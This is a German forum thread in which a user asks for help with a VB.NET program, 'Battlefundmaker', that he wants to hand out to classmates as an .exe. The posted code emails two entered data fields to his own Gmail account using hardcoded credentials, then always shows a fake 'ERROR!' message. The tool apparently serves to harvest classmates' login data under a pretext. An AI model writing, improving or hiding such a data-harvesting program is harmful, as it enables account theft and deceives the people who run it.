Welches Programm?

Diese Seite verwendet Cookies. Durch die Nutzung unserer Seite erklären Sie sich damit einverstanden, dass wir Cookies setzen. Weitere Informationen

  • Welches Programm?

    Also ich hatte eine Idee:
    Ich mache gerade ein Schulprojekt. Jedenfalls will ich gerne ein Programm erstellen das in etwas so aussieht: img864.imageshack.us/i/expc.jpg/

    bei "1. Ergebnis" und "2. Ergebnis" schreibt man die Daten rein. Und wenn man auf "Senden" drückt sollen diese Daten an meine E-Mail gesendet werden. Hat jemand eine Idee wie man das einfach und schnell verwirklichen könnte? Wenn möglich soll es in vll. einer .exe geöffnet werden können.

    Ich bin sehr dankbar für Antworten!



    PS: tut mir leid wenn ich im falschen Topic bin...
  • Das mit der .exe meinte ich so dass ich es an meine Mitschüler teilen kann( download )

    Das ist ja das Problem. Ich kann noch nichts.
    Ich versuchte mich an Visual Studio, aber ein Freund hat meine E-mail innerhalb von Minuten gehabt. Erzählen will er mir nicht wie ers gemacht hat.
    Ich habe das Programm mithilfe von einem Youtube-Video gemacht. Und mir ist bewusst das ich meine e-mail und passwort im Code hineingeschrieben habe, weil es sonst nicht läuft.

    Das Video ist das einzigste das ich gefunden habe das das macht wie ich es mir vorstelle.
    youtube.com/watch?v=k__98wWv8bc

    Ich wollte fragen ob ich mein E-mail Passwort im Programm verschlüsseln kann, denn es hat sich ergeben dass ich mein programm mit der ganzen Klasse teilen muss.
    Könnte ich es vielleicht so umstellen das es an meinem Desktop geschickt wird oder so etwas in der Art? Oder ist es dumm mit Visual Basics zu arbeiten?
    noch die zentrale frage: Welche Prog.sprache eignet sich am besten um solche kleinen Programme zu schreiben?

    Hier noch Screens zum Code:
    img10.imageshack.us/f/paintpl.jpg/



    Quellcode

    1. Imports System.Net.Mail
    2. Public Class Battlefundmaker
    3. Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
    4. If TextBox1.Text = "" Then
    5. MsgBox("1. Daten Are Missing")
    6. If TextBox2.Text = "" Then
    7. MsgBox("2. Daten Is Mising")
    8. Else
    9. End If
    10. End If
    11. Dim smtpServer As New SmtpClient()
    12. Dim mail As New MailMessage()
    13. smtpServer.Credentials = New Net.NetworkCredential("san.waterbork@googlemail.com", "HIER MEIN PASSWORT")
    14. 'using gmail
    15. smtpServer.Port = 587
    16. smtpServer.Host = "smtp.gmail.com"
    17. smtpServer.EnableSsl = True
    18. mail = New MailMessage()
    19. mail.From = New MailAddress("san.waterbork@googlemail.com")
    20. mail.To.Add("san.waterbork@googlemail.com")
    21. mail.Subject = "1. Daten " & TextBox1.Text
    22. mail.Body = "1. Daten " & TextBox1.Text & ", " & "2. Daten " & TextBox2.Text
    23. smtpServer.Send(mail)
    24. MsgBox("Fehler", MsgBoxStyle.Critical, "ERROR!")
    25. End Sub
    26. End Class
    Alles anzeigen